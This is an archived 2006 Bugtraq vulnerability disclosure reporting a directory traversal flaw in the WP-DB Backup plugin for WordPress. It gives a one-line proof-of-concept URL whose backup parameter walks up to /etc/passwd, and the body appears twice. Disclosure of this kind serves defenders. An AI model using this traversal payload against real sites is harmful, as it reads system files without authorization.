Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
BugTraq
Back to list
|
Post reply
Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability
Aug 14 2006 08:36AM
ss_team (ssteam pl gmail com)
Hi all,
Software: WP-DB Backup Plugin for Wordpress
Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/
Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.
PoC:
http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=
../../../../../etc/passwd
Credits:
marc & shb from ssteam are credited with discoverying this vulnerability.
Vendor:
not contacted.
--
Coolest IT security blog: http://ssteam.ath.cx
[ reply ]
Privacy Statement
Copyright 2007, SecurityFocus
Software: WP-DB Backup Plugin for Wordpress
Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/
Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.
PoC:
http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=
../../../../../etc/passwd
Credits:
marc & shb from ssteam are credited with discoverying this vulnerability.
Vendor:
not contacted.
--
Coolest IT security blog: http://ssteam.ath.cx
[ reply ]